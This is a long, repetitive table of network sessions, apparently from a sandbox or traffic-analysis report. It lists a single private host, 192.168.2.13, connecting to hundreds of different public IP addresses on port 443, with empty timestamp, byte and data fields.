                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18836192.168.2.133668844.229.75.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18837192.168.2.1347116134.64.52.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18838192.168.2.135431065.60.115.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18839192.168.2.1357330143.51.238.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18840192.168.2.13494969.124.148.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18841192.168.2.1341342163.212.209.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18842192.168.2.133410865.23.75.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18843192.168.2.134851661.3.56.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18844192.168.2.1337796162.88.198.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18845192.168.2.134716092.210.34.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18846192.168.2.135610650.91.51.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18847192.168.2.1333766173.30.247.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18848192.168.2.134456414.185.245.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18849192.168.2.1358088105.54.83.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18850192.168.2.135000691.159.231.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18851192.168.2.1341048141.15.72.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18852192.168.2.1353254193.155.202.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18853192.168.2.1348902171.226.135.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18854192.168.2.1345388183.43.100.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18855192.168.2.1346048137.53.238.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18856192.168.2.1342016161.224.75.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18857192.168.2.1360406124.22.110.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18858192.168.2.134134057.76.101.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18859192.168.2.133748848.6.237.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18860192.168.2.1333064165.97.160.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18861192.168.2.1349636132.32.30.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18862192.168.2.1344116125.162.53.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18863192.168.2.133935069.36.53.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18864192.168.2.1342618191.114.177.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18865192.168.2.1341738136.33.100.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18866192.168.2.133329853.51.124.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18867192.168.2.1357712204.127.122.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18868192.168.2.1359308209.136.238.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18869192.168.2.1346708100.144.127.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18870192.168.2.13498441.66.153.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18871192.168.2.134293018.28.206.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18872192.168.2.135018483.123.32.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18873192.168.2.1345112155.190.168.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18874192.168.2.135214885.162.165.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18875192.168.2.134266297.164.152.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18876192.168.2.134500267.238.254.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18877192.168.2.1356764222.16.169.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18878192.168.2.1351576101.150.137.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18879192.168.2.135821466.15.238.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18880192.168.2.1353670162.79.65.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18881192.168.2.1350786116.92.232.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18882192.168.2.1346714140.105.252.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18883192.168.2.1360834134.188.107.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18884192.168.2.1349678150.201.241.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18885192.168.2.1345420123.154.194.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18886192.168.2.133493898.240.93.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18887192.168.2.1335352193.51.167.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18888192.168.2.136098668.85.62.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18889192.168.2.1333852162.239.221.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18890192.168.2.1332798142.39.71.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18891192.168.2.1346734130.91.164.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18892192.168.2.1347306120.200.143.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18893192.168.2.133715437.242.160.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18894192.168.2.134159070.151.182.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18895192.168.2.1334820170.49.218.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18896192.168.2.1333172167.124.175.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18897192.168.2.135884098.115.117.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18898192.168.2.1342892209.2.191.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18899192.168.2.1352262119.114.242.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18900192.168.2.1344488122.101.247.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18901192.168.2.134972067.140.99.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18902192.168.2.1359912183.93.218.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18903192.168.2.135350683.247.89.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18904192.168.2.134826876.197.183.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18905192.168.2.1337408113.144.109.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18906192.168.2.1341302160.23.245.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18907192.168.2.1334574218.194.46.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18908192.168.2.135653864.159.255.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18909192.168.2.1348364117.154.238.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18910192.168.2.1358356121.142.149.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18911192.168.2.1346064126.92.55.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18912192.168.2.1349222213.189.155.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18913192.168.2.1341358142.44.249.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18914192.168.2.135465285.199.219.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18915192.168.2.1345038126.62.146.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18916192.168.2.1337416192.209.91.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18917192.168.2.1354666124.25.3.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18918192.168.2.1341850122.100.101.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18919192.168.2.135028864.195.224.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18920192.168.2.13456004.12.167.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18921192.168.2.1345796188.112.177.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18922192.168.2.1334420216.207.5.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18923192.168.2.135548896.84.191.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18924192.168.2.1359736209.174.149.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18925192.168.2.1358900118.167.112.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18926192.168.2.1358150143.26.39.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18927192.168.2.1343964108.46.167.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18928192.168.2.133303837.227.75.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18929192.168.2.134943678.47.107.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18930192.168.2.133768295.157.68.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18931192.168.2.135166669.133.157.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18932192.168.2.1358152130.83.146.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18933192.168.2.134885465.118.60.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18934192.168.2.1353876168.104.11.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18935192.168.2.1354588159.133.199.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18936192.168.2.1336348101.65.225.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18937192.168.2.1342260189.253.195.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18938192.168.2.136072857.127.27.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18939192.168.2.1341102124.141.55.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18940192.168.2.1357670178.136.137.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18941192.168.2.1346390179.2.59.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18942192.168.2.135090881.196.139.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18943192.168.2.1341116179.143.169.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18944192.168.2.1360046217.246.23.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18945192.168.2.1349800111.135.98.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18946192.168.2.1355684196.28.234.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18947192.168.2.133481648.41.215.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18948192.168.2.1346578209.245.42.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18949192.168.2.1360808140.87.14.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18950192.168.2.134803080.108.84.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18951192.168.2.1341420187.119.3.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18952192.168.2.134028274.136.52.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18953192.168.2.1352698170.133.145.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18954192.168.2.1357266163.115.218.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18955192.168.2.1345452218.25.101.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18956192.168.2.1342354163.60.48.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18957192.168.2.135793475.205.227.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18958192.168.2.1344276181.66.5.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18959192.168.2.1353202172.106.163.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18960192.168.2.1359602167.175.210.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18961192.168.2.134893670.123.122.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18962192.168.2.1335586122.99.208.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18963192.168.2.1352892111.159.178.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18964192.168.2.1347548189.65.176.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18965192.168.2.1353092165.135.141.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18966192.168.2.135600284.14.200.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18967192.168.2.1338330175.197.86.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18968192.168.2.1345060101.216.214.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18969192.168.2.134304098.137.63.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18970192.168.2.135144617.109.10.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18971192.168.2.1338822148.109.14.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18972192.168.2.1348664133.25.126.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18973192.168.2.1359898108.94.96.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18974192.168.2.133711445.68.178.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18975192.168.2.1359450213.159.90.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18976192.168.2.1343228217.132.167.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18977192.168.2.1342270119.86.222.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18978192.168.2.134420694.242.163.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18979192.168.2.1339262106.215.247.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18980192.168.2.1355876143.222.23.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18981192.168.2.135346087.102.160.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18982192.168.2.1356810120.58.250.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18983192.168.2.1348142199.125.37.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18984192.168.2.1342998153.213.95.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18985192.168.2.136037074.174.82.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18986192.168.2.1358764218.63.157.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18987192.168.2.1356624205.82.228.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18988192.168.2.134130098.191.108.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18989192.168.2.134996499.100.64.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18990192.168.2.1333706194.30.50.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18991192.168.2.13606982.189.47.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18992192.168.2.1345134110.117.170.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18993192.168.2.135975836.252.88.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18994192.168.2.1352718156.41.1.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18995192.168.2.135817268.204.202.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18996192.168.2.1359474100.166.250.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18997192.168.2.1349038197.58.98.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18998192.168.2.1345168195.34.101.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18999192.168.2.1344348153.148.140.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19000192.168.2.1357098206.224.178.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19001192.168.2.1339686166.94.3.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19002192.168.2.1335818171.196.217.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19003192.168.2.1359028115.140.252.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19004192.168.2.1359186143.24.70.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19005192.168.2.135316086.60.182.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19006192.168.2.1336980169.104.183.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19007192.168.2.133579036.115.41.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19008192.168.2.1354264167.90.90.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19009192.168.2.1337832108.208.131.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19010192.168.2.135475051.140.105.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19011192.168.2.1338396201.8.34.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19012192.168.2.134755686.169.187.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19013192.168.2.1359036180.249.171.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19014192.168.2.1340450190.136.132.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19015192.168.2.135159045.163.101.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19016192.168.2.1344282194.128.38.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19017192.168.2.1353276132.86.3.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19018192.168.2.136091058.61.21.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19019192.168.2.1341564178.247.113.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19020192.168.2.135556417.41.215.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19021192.168.2.1334162200.24.73.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19022192.168.2.1337380162.200.49.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19023192.168.2.1355638205.6.28.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19024192.168.2.1342102139.215.189.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19025192.168.2.135910495.54.20.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19026192.168.2.1348020141.160.195.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19027192.168.2.1348116181.20.221.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19028192.168.2.134334051.39.111.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19029192.168.2.1338852213.148.209.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19030192.168.2.1351392190.134.74.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19031192.168.2.1333562139.37.226.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19032192.168.2.1354386221.79.84.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19033192.168.2.1352876107.209.34.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19034192.168.2.1359686159.175.104.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19035192.168.2.1342294156.118.117.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19036192.168.2.135372434.49.33.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19037192.168.2.135620089.28.152.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19038192.168.2.134590644.39.243.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19039192.168.2.134523891.86.65.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19040192.168.2.134320291.90.205.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19041192.168.2.1351188178.243.71.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19042192.168.2.1333944159.185.234.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19043192.168.2.1340418210.178.193.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19044192.168.2.13355022.127.234.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19045192.168.2.133663253.17.138.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19046192.168.2.1355886167.34.15.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19047192.168.2.134610452.228.27.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19048192.168.2.135220439.193.104.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19049192.168.2.1355182107.112.88.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19050192.168.2.1337444155.97.140.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19051192.168.2.1349556129.112.30.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19052192.168.2.1354390222.247.42.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19053192.168.2.135301084.88.253.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19054192.168.2.135028023.2.192.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19055192.168.2.1335088144.247.23.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19056192.168.2.1355756121.196.224.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19057192.168.2.1340040117.159.229.194443
